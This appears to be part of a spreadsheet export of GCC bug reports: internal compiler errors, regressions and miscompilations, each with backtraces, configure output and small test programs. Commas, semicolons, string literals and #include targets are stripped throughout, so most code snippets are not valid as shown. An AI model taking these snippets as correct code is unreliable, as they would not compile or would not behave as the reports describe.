COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 4.9.0 20131121 (experimental) [trunk revision 205234] (GCC) 
$ 
$ gcc-trunk -O2 -c small.c
$ gcc-4.8.2 -O3 -c small.c
$
$ gcc-trunk -O3 -c small.c
small.c: In function â€˜fn2â€™:
small.c:18:1: internal compiler error: in set_value_range at tree-vrp.c:443
 fn2 ()
 ^
0xba89bc set_value_range
	../../gcc-trunk/gcc/tree-vrp.c:443
0xbb913a extract_range_from_assert
	../../gcc-trunk/gcc/tree-vrp.c:1749
0xbb913a extract_range_from_assignment
	../../gcc-trunk/gcc/tree-vrp.c:3772
0xbba671 vrp_visit_assignment_or_call
	../../gcc-trunk/gcc/tree-vrp.c:6742
0xbba671 vrp_visit_stmt
	../../gcc-trunk/gcc/tree-vrp.c:7553
0xb00612 simulate_stmt
	../../gcc-trunk/gcc/tree-ssa-propagate.c:324
0xb00bfd simulate_block
	../../gcc-trunk/gcc/tree-ssa-propagate.c:447
0xb00bfd ssa_propagate(ssa_prop_result (*)(gimple_statement_base* edge_def** tree_node**) ssa_prop_result (*)(gimple_statement_base*))
	../../gcc-trunk/gcc/tree-ssa-propagate.c:854
0xbbb66b execute_vrp
	../../gcc-trunk/gcc/tree-vrp.c:9710
0xbbb66b execute
	../../gcc-trunk/gcc/tree-vrp.c:9801
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
----------------------------------------
int a b c e g
char d[5] f
int
fn1 ()
{
  if (b)
    {
      g = 0
      return 0
    }
  for (f = 0 f != 1 f--)
  return 0
}
void
fn2 ()
{
  d[4] = -1
  for (a = 4 a a--)
    {
      fn1 ()
      e = c &lt; -2147483647 - 1 - d[a] ? c : 0
    }
}</t>
  </si>
  <si>
    <t>GCC-6092</t>
  </si>
  <si>
    <t>sparc-sun-solaris2.7 gcc-3.1 has hundreds of libjava failures with -m64</t>
  </si>
  <si>
    <t>When running the libjava testsuite with -m64 I see hundreds of extra failures.  E.g. see:
http://gcc.gnu.org/ml/gcc-testresults/2002-03/msg00645.html
Release:
3.1 20020324 (prerelease)
Environment:
sparc-sun-solaris2.7 native as/ld
How-To-Repeat:
Use RUNTESTFLAGS=--target_board 'unix{-m64}'</t>
  </si>
  <si>
    <t>davem</t>
  </si>
  <si>
    <t>GCC-35645</t>
  </si>
  <si>
    <t>ICE in gimplify_expr at gimplify.c:6120</t>
  </si>
  <si>
    <t>Not sure the declaration below is legal but it ICEs anyway.
package pak1 is
   type T1(x1: integer) is record
      x2: integer := T1.x1
   end record
end pak1
gcc-4.1 -c pak1.ads
+===========================GNAT BUG DETECTED==============================+
| 4.1.3 20070518 (prerelease) (Debian 4.1.2-8) (x86_64-pc-linux-gnu) GCC error:|
| in gimplify_expr at gimplify.c:4519                                     |
| No source file position information available                            |
+===========================GNAT BUG DETECTED==============================+
| 4.2.2 (i686-unknown-linux-gnu) in gimplify_expr at gimplify.c:5888      |
| No source file position information available                            |
gcc-4.3 -c pak1.ads
+===========================GNAT BUG DETECTED==============================+
| 4.3.1 20080309 (prerelease) (x86_64-pc-linux-gnu) GCC error:             |
| in gimplify_expr at gimplify.c:6120                                     |
| Error detected around pak1.ads:3                                         |</t>
  </si>
  <si>
    <t>GCC-48893</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE in evaulate_conditions_for_edge at ipa-inline-analysis.c:477</t>
  </si>
  <si>
    <t>Created attachment 24197
pex-unix.i
if [ x-fPIC != x ] then \
          /xxx/gnu/gcc/objdir/./prev-gcc/xgcc -B/xxx/gnu/gcc/objdir/./prev-gcc/ 
-B/opt/gnu/gcc/gcc-4.6/hppa2.0w-hp-hpux11.00/bin/ -B/opt/gnu/gcc/gcc-4.6/hppa2.0
w-hp-hpux11.00/bin/ -B/opt/gnu/gcc/gcc-4.6/hppa2.0w-hp-hpux11.00/lib/ -isystem /
opt/gnu/gcc/gcc-4.6/hppa2.0w-hp-hpux11.00/include -isystem /opt/gnu/gcc/gcc-4.6/
hppa2.0w-hp-hpux11.00/sys-include    -c -DHAVE_CONFIG_H -g -O2  -I. -I../../gcc/
libiberty/../include  -W -Wall -Wwrite-strings -Wc++-compat -Wstrict-prototypes 
-pedantic  -fPIC ../../gcc/libiberty/pex-unix.c -o pic/pex-unix.o \
        else true fi
../../gcc/libiberty/pex-unix.c:788:1: internal compiler error: vector VEC(treeb
ase) index domain error in evaluate_conditions_for_edge at ipa-inline-analysis.
c:577
Please submit a full bug report
Revision 172431 was ok.
-bash-3.2$ ./xgcc -B./ -v
Reading specs from ./specs
COLLECT_GCC=./xgcc
COLLECT_LTO_WRAPPER=./lto-wrapper
Target: hppa2.0w-hp-hpux11.00
Configured with: ../gcc/configure --with-gnu-as --with-as=/opt/gnu/bin/as --enable-shared --with-local-prefix=/opt/gnu --prefix=/opt/gnu/gcc/gcc-4.6 --with-gmp=/opt/gnu/gcc/gcc-4.6 --enable-debug=no --disable-nls --enable-threads=posix --enable-languages=cc++objcfortranadaobj-c++
Thread model: posix
gcc version 4.7.0 20110505 (experimental) [trunk revision 173407] (GCC) 
Seems to be HP-UX 11.00 specific.</t>
  </si>
  <si>
    <t>GCC-24978</t>
  </si>
  <si>
    <t>ICE in gfc_assign_data_value_range</t>
  </si>
  <si>
    <t>Following code is causing the internal compiler error.
$ cat test.f90
       real            :: a(55)
       data a/25*1.0/
       data a(11) a(31) a(12) a(33) /2*1.0 2*2.0/
       data a(2:54) /4*1.0/
       end
$ gfortran test.f90
t38.f90:0: internal compiler error: in gfc_assign_data_value_range at fortran/data.c:423
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ gfortran -v
Using built-in specs.
Target: powerpc64-linux
Configured with: /home/gccbuild/gcc_trunk_anonsvn/trunk/configure --prefix=/opt/gcc-nightly/trunk-20051117 --build=powerpc64-linux --host=powerpc64-linux --target=powerpc64-linux --with-cpu=default32 --with-as=/opt/gcc-nightly/trunk-20051117/bin/as --with-ld=/opt/gcc-nightly/trunk-20051117/bin/ld --enable-threads=posix --enable-shared --enable-__cxa_atexit --enable-languages=cc++f95javaobjcobj-c++ --enable-checking --with-mpfr=/opt/gcc-nightly/trunk-20051117
Thread model: posix
gcc version 4.1.0 20051117 (experimental)</t>
  </si>
  <si>
    <t>GCC-9303</t>
  </si>
  <si>
    <t>[sparc-solaris2.8] trying to build gcc 3.2 on solaris 2.8 fails</t>
  </si>
  <si>
    <t xml:space="preserve"> After configuring gcc this way:
../configure --with-gnu-ld --with-ld=/usr/local/bin/ld --with-gnu-nm --with-nm=/usr/local/bin/nm --with-gnu-as --with-as=/usr/local/bin/as --enable-threads=posix --enable-shared
Trying to perform make yields the following error: 
(cd .libs &amp;&amp; rm -f libgcjgc_convenience.la &amp;&amp; ln -s ../libgcjgc_convenience.la libgcjgc_convenience.la)
true AR_FLAGS=rc  CC_FOR_BUILD=gcc  CFLAGS=-g -O2  -m64  CXXFLAGS=-g -O2  -m64  CFLAGS_FOR_BUILD=  CFLAGS_FOR_TARGET=-g -O2  INSTALL=../../../../boehm-gc/./install-sh -c  INSTALL_DATA=../../../../boehm-gc/./install-sh -c -m 644  INSTALL_PROGRAM=../../../../boehm-gc/./install-sh -c  INSTALL_SCRIPT=../../../../boehm-gc/./install-sh -c  LDFLAGS=-m64  LIBCFLAGS=-g -O2  -m64  LIBCFLAGS_FOR_TARGET=-g -O2  MAKE=make  MAKEINFO=/net/cel2-4/src/sources/gcc-3.2/missing makeinfo   PICFLAG=  PICFLAG_FOR_TARGET=  SHELL=/bin/sh  EXPECT=expect  RUNTEST=runtest  RUNTESTFLAGS=  exec_prefix=/usr/local  infodir=/usr/local/info  libdir=/usr/local/lib  prefix=/usr/local  tooldir=/usr/local/sparc-sun-solaris2.8  AR=ar  AS=/usr/local/bin/as  CC=/net/cel2-4/src/sources/gcc-3.2/objdir/gcc/xgcc -B/net/cel2-4/src/sources/gcc-3.2/objdir/gcc/ -B/usr/local/sparc-sun-solaris2.8/bin/ -B/usr/local/sparc-sun-solaris2.8/lib/ -isystem /usr/local/sparc-sun-solaris2.8/include  -m64  CXX=/net/cel2-4/src/sources/gcc-3.2/objdir/gcc/g++ -B/net/cel2-4/src/sources/gcc-3.2/objdir/gcc/ -nostdinc++ -nostdinc++ -I/net/cel2-4/src/sources/gcc-3.2/objdir/sparc-sun-solaris2.8/sparcv9/libstdc++-v3/include/sparc-sun-solaris2.8 -I/net/cel2-4/src/sources/gcc-3.2/objdir/sparc-sun-solaris2.8/sparcv9/libstdc++-v3/include -I/net/cel2-4/src/sources/gcc-3.2/libstdc++-v3/libsupc++ -I/net/cel2-4/src/sources/gcc-3.2/libstdc++-v3/libio -I/net/cel2-4/src/sources/gcc-3.2/libstdc++-v3/include/backward -I/net/cel2-4/src/sources/gcc-3.2/libstdc++-v3/testsuite -L/net/cel2-4/src/sources/gcc-3.2/objdir/sparc-sun-solaris2.8/sparcv9/libstdc++-v3/src -L/net/cel2-4/src/sources/gcc-3.2/objdir/sparc-sun-solaris2.8/sparcv9/libstdc++-v3/src/.libs -B/usr/local/sparc-sun-solaris2.8/bin/ -B/usr/local/sparc-sun-solaris2.8/lib/ -isystem /usr/local/sparc-sun-solaris2.8/include  -m64  LD=/usr/local/bin/ld  LIBCFLAGS=-g -O2  -m64  NM=/usr/local/sparc-sun-solaris2.8/bin/nm  PICFLAG=  RANLIB=true  DESTDIR= DO=all multi-do
mksh: Fatal error in reader: = missing from replacement macro reference
Current working directory /net/cel2-4/src/sources/gcc-3.2/objdir/sparc-sun-solaris2.8/libjava
*** Error code 1
make: Fatal error: Command failed for target `all-target-libjava'
Release:
gcc 3.2
Environment:
building gcc 3.2 on sun sparc solaris 8 using binutils 2.13.1 and compiler gcc version :
Reading specs from /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.4/specs
Configured with: ../configure --enable-libgcj
Thread model: posix
gcc version 3.0.4</t>
  </si>
  <si>
    <t>dita</t>
  </si>
  <si>
    <t>GCC-7287</t>
  </si>
  <si>
    <t>GCC 3.1 fails with an internal compiler error in ix86_secondary_memory_needed.</t>
  </si>
  <si>
    <t>GCC 3.1 running under Linux on an Pentium 4 system fails with an internal compiler error message while trying to compile the dlls/msvcrt/math.c file from Wine-20020710. 
The command used to compile is:
gcc -c -I. -I. -I../../include -I../../include  -O3 -march=pentium4 -mcpu=pentium4 -mmmx -m3dnow -msse -msse2 -Wall -mpreferred-stack-boundary=2 -fPIC -D__WINE__ -DUSE_MSVCRT_PREFIX -D_MT -D_REENTRANT -I/usr/X11R6/include -o math.o math.c
The resulting error message is:
math.c: In function `_fpclass':
math.c:350: Internal compiler error in ix86_secondary_memory_needed at config/i386/i386.c:12251
GCC was configured with: 
../configure --enable-languages=cobjc --enable-shared --enable-static --enable-threads=posix
Thread model: single
GCC 3.1 compiled with the GCC 2.96 compiler supplied with Mandrake 8.2.
Release:
3.1
Environment:
i686-pc-linux-gnu
How-To-Repeat:
Compile the dlls/msvcrt/math.c file of the Wine-20020710 source release using:
gcc -c -I. -I. -I../../include -I../../include  -O3 -march=pentium4 -mcpu=pentium4 -mmmx -m3dnow -msse -msse2 -Wall -mpreferred-stack-boundary=2 -fPIC -D__WINE__ -DUSE_MSVCRT_PREFIX -D_MT -D_REENTRANT -I/usr/X11R6/include -o math.o math.c -save-temps</t>
  </si>
  <si>
    <t>xx_jayrod_x</t>
  </si>
  <si>
    <t>GCC-53089</t>
  </si>
  <si>
    <t>[4.8 Regression] gfortran.dg/coarray/atomic_1.f90 and gfortran.dg/coarray/registering_1.f90</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #53088 +++
On Linux/x86 revision 186687:
http://gcc.gnu.org/ml/gcc-cvs/2012-04/msg00639.html
caused:
FAIL: gfortran.dg/coarray/atomic_1.f90 -fcoarray=lib  -O2  -lcaf_single execution test
FAIL: gfortran.dg/coarray/registering_1.f90 -fcoarray=lib  -O2  -lcaf_single execution test</t>
  </si>
  <si>
    <t>GCC-79022</t>
  </si>
  <si>
    <t>trunk/gcc/gengtype.h: create_nested_ptr_option: decl &amp; defn don't match ?</t>
  </si>
  <si>
    <t>[trunk/gcc/gengtype.h:206] -&gt; [trunk/gcc/gengtype.c:937]: (warning) Function 'create_nested_ptr_option' argument order different: declaration ' t from to' definition 'next t to from'
Line 206 is
options_p create_nested_ptr_option (options_p type_p t
                     const char *from const char *to)
Line 937 is
options_p
create_nested_ptr_option (options_p next type_p t
              const char *to const char *from)
Suggest the declaration should match the definition.</t>
  </si>
  <si>
    <t>GCC-52552</t>
  </si>
  <si>
    <t>[OOP] ICE when trying to allocate non-allocatable object giving a dynamic type</t>
  </si>
  <si>
    <t>Created attachment 26872
erroneous code causing GFortran to crash
GFortran casts an internal error with the simple attached code using some new OO features of Fortran:
# gfortran oo_err.f90 
f951: internal compiler error: Speicherzugriffsfehler
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The code is obviously erroneous the bug is that GFortran crashes instead of giving graful explanations.
Note: GFortran does behave if you omit te:: in the allocate statement.</t>
  </si>
  <si>
    <t>gccbgz.lionm</t>
  </si>
  <si>
    <t>GCC-45194</t>
  </si>
  <si>
    <t>lto1: internal compiler error: in lto_varpool_replace_node at lto-symtab.c:292</t>
  </si>
  <si>
    <t>With gcc trunk revision 162816 I am unable to compile Firefox with
WHOPR (or LTO for that matter) because I get the following ICE:
lto1: internal compiler error: in lto_varpool_replace_node at lto-symtab.c:292
I will attach preprocessed versions of four source files which are
necessary to reproduce the issue.</t>
  </si>
  <si>
    <t>GCC-5546</t>
  </si>
  <si>
    <t>Bad const verification</t>
  </si>
  <si>
    <t>A const string (type char* not string from ) can
be overwritten by strcpy
Release:
gcc 3.0.3
Environment:
DOS (DJGPP)
How-To-Repeat:
#include 
#include 
using namespace std
int main(int char* [])
{
  cout &lt;&lt; Hello &lt;&lt; endl
  strcpy(Hello World)
  cout &lt;&lt; Hello &lt;&lt; endl
  return 0
}
compiled with `gxx -Wall -ansi -pedantic`
no warnings appear during compilation
the result on screen is
Hello
World
Terrific isn't it ?</t>
  </si>
  <si>
    <t>jbach1</t>
  </si>
  <si>
    <t>GCC-51252</t>
  </si>
  <si>
    <t>FAIL: c-c++-common/tm/freq.c (internal compiler error)</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/c-c++-common/tm/freq.c    -fgnu-tm -O -S  -o freq.s    (timeout = 300)
/test/gnu/gcc/gcc/gcc/testsuite/c-c++-common/tm/freq.c:14:1: internal compiler e
rror: in default_no_named_section at varasm.c:6295Please submit a full bug reportwith preprocessed source if appropriate.
See  for instructions.compiler exited with status 1
output is:
/test/gnu/gcc/gcc/gcc/testsuite/c-c++-common/tm/freq.c:14:1: internal compiler e
rror: in default_no_named_section at varasm.c:6295
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
FAIL: c-c++-common/tm/freq.c (internal compiler error)
FAIL: c-c++-common/tm/freq.c (test for excess errors)
-bash-3.2$ ./xgcc -B./ -v
Reading specs from ./specs
COLLECT_GCC=./xgcc
COLLECT_LTO_WRAPPER=./lto-wrapper
Target: hppa2.0w-hp-hpux11.11
Configured with: ../gcc/configure --with-gnu-as --with-as=/opt/gnu/bin/as --enable-shared --with-local-prefix=/opt/gnu --prefix=/opt/gnu/gcc/gcc-4.7 --with-gmp=/opt/gnu/gcc/gmp --enable-threads=posix --enable-debug=no --disable-nls --disable-lto --without-cloog --without-ppl --enable-languages=cc++objcfortranjavaadaobj-c++
Thread model: posix
gcc version 4.7.0 20111116 (experimental) [trunk revision 181404] (GCC) 
Target doesn't support named sections.</t>
  </si>
  <si>
    <t>GCC-52559</t>
  </si>
  <si>
    <t>[4.8 Regression] Spurious \x00 in error messages of lines with tab</t>
  </si>
  <si>
    <t>Regression probably due to:
  http://gcc.gnu.org/ml/fortran/2012-03/msg00015.html
There is now a spurious \x00 in the error messages:
 allocate(t::o)\x00
                1
Error: Type of entity at (1) is type incompatible with typespec</t>
  </si>
  <si>
    <t>GCC-57619</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] std::unordered_map and std::unordered_multimap::insert invoking std::pair move constructor</t>
  </si>
  <si>
    <t>The following code is invoking the std::pair move constructor:
int main ()
{
    std::unordered_map mymap
    std::unordered_multimap mymultimap
    std::pair mypair{std::string(key) std::string(value)}
    mymultimap.insert(mypair) // std::pair move constructor invoked here
    mymap.insert(mypair) // strings already moved out!
}
This seems related to http://gcc.gnu.org/bugzilla/show_bug.cgi?id=53657.
As far as I can tell overload resolution is choosing `insert(_Pair&amp;&amp; __x)` over `insert(const value_type&amp; __x)`. Since this is an lvalue the latter should be chosen. This happens for std::unordered_map::insert and std::unordered_multimap::insert.</t>
  </si>
  <si>
    <t>gdjss2728</t>
  </si>
  <si>
    <t>GCC-70460</t>
  </si>
  <si>
    <t>[4.9/5/6 Regression] Miscompilation of glibc on i686-linux starting with r234101</t>
  </si>
  <si>
    <t>The following testcase distilled from glibc's vfprintf is miscompiled at -O2 starting with r234101.  It has been reported only on i686 but the testcase below fails also on x86_64-linux.
int c
__attribute__((noinline noclone)) void
foo (int x)
{
  static int b[] = { 
  void *a = 
  goto *a
lab1:
  c += 2
lab2:
  c++
lab0:
}
int
main ()
{
  foo (0)
  if (c != 3)
    __builtin_abort ()
  foo (1)
  if (c != 4)
    __builtin_abort ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-41547</t>
  </si>
  <si>
    <t>ICEs in lto_symtab_merge_decl at lto-symtab.c:577</t>
  </si>
  <si>
    <t>template  
class DataArray {
    int max() const { }
}
class Name { }
class DataHashTable {
    template  class Element { }
    DataArray  &gt; m_elem
}
DataHashTable p
./g++ -B. -nostdlib -fPIC -shared spxgeneralsm.3.ii -flto
lto1: internal compiler error: in lto_symtab_merge_decl at lto-symtab.c:577
DataArray::max is not mangled.</t>
  </si>
  <si>
    <t>GCC-14381</t>
  </si>
  <si>
    <t>[3.3/3.4/4.0 Regression] sched2 moving may throw instructions into epilogue</t>
  </si>
  <si>
    <t>g++ is compiling
------------------------------------------------------------------------
typedef struct kkclass
typedef struct kkclass *jclass
struct _Jv_VTable
{
  jclass clas
}
jclass
getClass (void *p)
{
  _Jv_VTable **dt = (_Jv_VTable **) p
  return (*dt)-&gt;clas
}
------------------------------------------------------------------------
into 
_Z8getClassPv:
.LFB2:
        pushl   %ebp
.LCFI0:
        movl    %esp %ebp
.LCFI1:
        movl    8(%ebp) %edx
        popl    %ebp
        movl    (%edx) %eax
        movl    (%eax) %eax
        ret
.LFE2:
where as you can see the code for the memory access is moved after
the stack adjustment in the epilogue.
This is despite the fact that this code was compiled with
-fnon-call-exceptions and -fno-omit-frame-pointer.
This causes a runtime failure to catch a null pointer exception.
Insns that may trap must not be move into the epilogue because stack
unwinding when throwing exceptions will not work correctly.
g++ 3.2.2 does this which is correct:
_Z8getClassPv:
.LFB2:
        pushl   %ebp
.LCFI0:
        movl    %esp %ebp
.LCFI1:
        movl    8(%ebp) %eax
        movl    (%eax) %eax
        movl    (%eax) %eax
        leave
        ret
.LFE2:
The movement of the popl %ebp instruction seems to be in sched2.
Compiler options used were -O3 -fno-omit-frame-pointer -fnon-call-exceptions.</t>
  </si>
  <si>
    <t>GCC-39201</t>
  </si>
  <si>
    <t>[meta-bug] ivopts metabug</t>
  </si>
  <si>
    <t>Metabug for ivopts issues</t>
  </si>
  <si>
    <t>GCC-39856</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression] ICE in subst_stack_regs_pat at reg-stack.c:1386</t>
  </si>
  <si>
    <t>SPEC CPU 2006 453.povray ICEs compiling super.cpp with
&gt; g++-4.4 -S -O3 -fomit-frame-pointer -msse3 -m32 -march=i586 super.ii
super.cpp: In function 'void pov::Superellipsoid_Normal(double* pov::OBJECT* pov::INTERSECTION*)':
super.cpp:515: internal compiler error: in subst_stack_regs_pat at reg-stack.c:1386
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-58547</t>
  </si>
  <si>
    <t>[4.9 Regression] rtlanal.c:5482:19: error: comparison between signed and unsigned integer expressions [-Werror=sign-compare]</t>
  </si>
  <si>
    <t>Bootstrap is broken:
/home/dave/gnu/gcc/objdir/./prev-gcc/xg++ -B/home/dave/gnu/gcc/objdir/./prev-gcc/ -B/home/dave/opt/gnu/gcc/gcc-4.9/hppa-linux-gnu/bin/ -nostdinc++ -B/home/dave/gnu/gcc/objdir/prev-hppa-linux-gnu/libstdc++-v3/src/.libs -B/home/dave/gnu/gcc/objdir/prev-hppa-linux-gnu/libstdc++-v3/libsupc++/.libs -I/home/dave/gnu/gcc/objdir/prev-hppa-linux-gnu/libstdc++-v3/include/hppa-linux-gnu -I/home/dave/gnu/gcc/objdir/prev-hppa-linux-gnu/libstdc++-v3/include -I/home/dave/gnu/gcc/gcc/libstdc
++-v3/libsupc++ -L/home/dave/gnu/gcc/objdir/prev-hppa-linux-gnu/libstdc++-v3/src
/.libs -L/home/dave/gnu/gcc/objdir/prev-hppa-linux-gnu/libstdc++-v3/libsupc++/.l
ibs -c   -g -O2 -DIN_GCC   -fno-exceptions -fno-rtti -fasynchronous-unwind-table
s -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -
fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gc
c/gcc/../include -I../../gcc/gcc/../libcpp/include  -I../../gcc/gcc/../libdecnum
ber -I../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber -I../../gcc/gcc/../lib
backtrace -DCLOOG_INT_GMP    -o rtlanal.o -MT rtlanal.o -MMD -MP -MF ./.deps/rtl
anal.TPo ../../gcc/gcc/rtlanal.c
../../gcc/gcc/rtlanal.c: In function â€˜bool lsb_bitfield_op_p(rtx)â€™:
../../gcc/gcc/rtlanal.c:5482:19: error: comparison between signed and unsigned integer expressions [-Werror=sign-compare]
       return (pos == (BITS_BIG_ENDIAN ? GET_MODE_PRECISION (mode) - len : 0))
                   ^
make[3]: *** [rtlanal.o] Error 1</t>
  </si>
  <si>
    <t>GCC-67509</t>
  </si>
  <si>
    <t>[6 regression] FAIL: gfortran.dg/ieee/ieee_7.f90   -O0  execution test</t>
  </si>
  <si>
    <t>$ gcc/gfortran -Bgcc/ -Bpowerpc64-suse-linux/32/libgfortran/ ../gcc/testsuite/gfortran.dg/ieee/ieee_7.f90 -O0 -pedantic-errors -fintrinsic-modules-path $PWD/powerpc64-suse-linux/./libgfortran/ -fno-unsafe-math-optimizations -frounding-math -fsignaling-nans -Bpowerpc64-suse-linux/./libgfortran/.libs -Lpowerpc64-suse-linux/./libgfortran/.libs -Lpowerpc64-suse-linux/./libgfortran/.libs -Lpowerpc64-suse-linux/./libatomic/.libs -lm -m64 -o ./ieee_7.exe -g
$ LD_LIBRARY_PATH=.:powerpc64-suse-linux/./libgfortran/.libs:powerpc64-suse-linux/./libgfortran/.libs:gcc ./ieee_7.exe 
Program aborted. Backtrace:
#0  0x3FFFB2FF3D93
Aborted
Breakpoint 1 MAIN__ () at ../gcc/testsuite/gfortran.dg/ieee/ieee_7.f90:37
37        if (ieee_selected_real_kind(0range(0._maxreal)+1) /= -2) call abort
(gdb) s
ieee_arithmetic::ieee_selected_real_kind (p=0 r=292 
    radix=)
    at ../../../libgfortran/ieee/ieee_arithmetic.F90:790
790         res = SELECTED_REAL_KIND (P R RADIX)
(gdb) fin
Run till exit from #0  ieee_arithmetic::ieee_selected_real_kind (p=0 r=292 
    radix=)
    at ../../../libgfortran/ieee/ieee_arithmetic.F90:790
0x0000000010000c7c in MAIN__ ()
    at ../gcc/testsuite/gfortran.dg/ieee/ieee_7.f90:37
37        if (ieee_selected_real_kind(0range(0._maxreal)+1) /= -2) call abort
Value returned is $1 = 8</t>
  </si>
  <si>
    <t>GCC-63693</t>
  </si>
  <si>
    <t>ICE in resolve_typename_type</t>
  </si>
  <si>
    <t>With gcc 4.9.2 or 4.9.1 running:
g++ --std=c++11 ch3.cpp
with the contents of ch3.cpp being:
template
class C{
 T t
 decltype(t)::a::
will produce:
ch3.cpp:4:2: internal compiler error: Segmentation fault
  decltype(t)::a::
  ^
0x91b6df crash_signal
        ../../gcc-4.9.2/gcc/toplev.c:337
0x532c2a resolve_typename_type(tree_node* bool)
        ../../gcc-4.9.2/gcc/cp/pt.c:21479
0x576cb1 cp_parser_nested_name_specifier_opt
        ../../gcc-4.9.2/gcc/cp/parser.c:5186
0x574343 cp_parser_id_expression
        ../../gcc-4.9.2/gcc/cp/parser.c:4711
0x57454f cp_parser_parse_and_diagnose_invalid_type_name
        ../../gcc-4.9.2/gcc/cp/parser.c:3024
0x58fa44 cp_parser_member_declaration
        ../../gcc-4.9.2/gcc/cp/parser.c:20256
0x571460 cp_parser_member_specification_opt
        ../../gcc-4.9.2/gcc/cp/parser.c:20108
0x571460 cp_parser_class_specifier_1
        ../../gcc-4.9.2/gcc/cp/parser.c:19336
0x571460 cp_parser_class_specifier
        ../../gcc-4.9.2/gcc/cp/parser.c:19563
0x571460 cp_parser_type_specifier
        ../../gcc-4.9.2/gcc/cp/parser.c:14339
0x582a60 cp_parser_decl_specifier_seq
        ../../gcc-4.9.2/gcc/cp/parser.c:11575
0x58e2b3 cp_parser_single_declaration
        ../../gcc-4.9.2/gcc/cp/parser.c:23181
0x58e774 cp_parser_template_declaration_after_export
        ../../gcc-4.9.2/gcc/cp/parser.c:23050
0x592389 cp_parser_declaration
        ../../gcc-4.9.2/gcc/cp/parser.c:10975
0x590ef8 cp_parser_declaration_seq_opt
        ../../gcc-4.9.2/gcc/cp/parser.c:10897
0x5926fa cp_parser_translation_unit
        ../../gcc-4.9.2/gcc/cp/parser.c:4028
0x5926fa c_parse_file()
        ../../gcc-4.9.2/gcc/cp/parser.c:31701
0x63ab23 c_common_parse_file()
        ../../gcc-4.9.2/gcc/c-family/c-opts.c:1067
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
/disk/0/erippey/series2_we_qa/csrc/reduce&gt;g++ --version
g++ (GCC) 4.9.2
Copyright (C) 2014 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Obviously this example is not valid C++.  It was arrived at by taking a much longer program which was believed to be valid C++ and removing parts without regard to validity.</t>
  </si>
  <si>
    <t>rippey.e</t>
  </si>
  <si>
    <t>GCC-66001</t>
  </si>
  <si>
    <t>[5/6 regression] ICE when NSDMI in a literal class uses a destructor</t>
  </si>
  <si>
    <t>Works in 4.9.2 broken in 5.1. Not sure about 5.
struct x {
    struct dt { ~ dt() {} }
        const 
} cx
in constexpr expansion of â€˜cx.x::x()â€™
internal compiler error: unexpected expression â€˜â€™ of kind try_finally</t>
  </si>
  <si>
    <t>potswa</t>
  </si>
  <si>
    <t>GCC-57465</t>
  </si>
  <si>
    <t>Failed postcondition for std::function constructed with null function pointer</t>
  </si>
  <si>
    <t>#include 
#include 
int main()
{
  using F = void()
  F* f = nullptr
  std::function x(f)
  assert( !x )
}
The assert should pass but it fails with all versions.
Note that clang++ with libstdc++ headers passes the test so this might be a front end bug (to be filed separately) but can be fixed/worked around easily enough in libstdc++ like so:
--- functional.orig     2013-05-30 10:48:27.081623873 +0100
+++ functional  2013-05-30 10:48:29.225370770 +0100
@@ -19647 +19647 @@
        template
          static bool
-         _M_not_empty_function(const _Tp*&amp; __fp)
+         _M_not_empty_function(_Tp* const&amp; __fp)
          { return __fp }
        template</t>
  </si>
  <si>
    <t>GCC-25999</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 Regression] compiler loses extern C for function after #pragma weak</t>
  </si>
  <si>
    <t>The following short program generates the mangled symbol _Z3Foov instead of the expected Foo when built with -DBUG.  Without -DBUG and the #pragma weak Random_Symbol line or if using g++ 3.2.3 the expected thing happens.
extern C {
 void Foo()
}
#ifdef BUG
#pragma weak Random_Symbol
#endif
void Foo() { }</t>
  </si>
  <si>
    <t>metcalf</t>
  </si>
  <si>
    <t>GCC-34262</t>
  </si>
  <si>
    <t>MVBITS does not work for arrays</t>
  </si>
  <si>
    <t>hades [TEST] cat bug-mvbits.f90 
program main
  implicit none
  integer :: a( 1 ) b( 1 )
  integer :: x y
  a = 1
  b = 0
  x = 1
  y = 0
  call mvbits (a 0 1 b 1)
  call mvbits (x 0 1 y 1)
  write (* *) 'a: ' a
  write (* *) 'x: ' x
  write (* *)
  write (* *) 'b: ' b
  write (* *) 'y: ' y
  write (* *)
  if ( all (b == y) ) then
     write (* *) 'GOOD:  b == y'
  else
     write (* *) 'BAD:  b /= y'
  end if
end program main
hades [TEST] ./a.out 
 a:            1
 x:            1
 b:            0
 y:            2
 BAD:  b /= y
hades [TEST] gfortran --version
GNU Fortran (GCC) 4.2.1 (Ubuntu 4.2.1-5ubuntu4)
Copyright (C) 2007 Free Software Foundation Inc.
It does not work for MacOS PowerPC either same output. The version
I used ton my Mac was:
epsilon [TEST] gfortran --version      
GNU Fortran (GCC) 4.3.0 20071017 (experimental) [trunk revision 129405]
Copyright (C) 2007 Free Software Foundation Inc.</t>
  </si>
  <si>
    <t>phl</t>
  </si>
  <si>
    <t>GCC-62195</t>
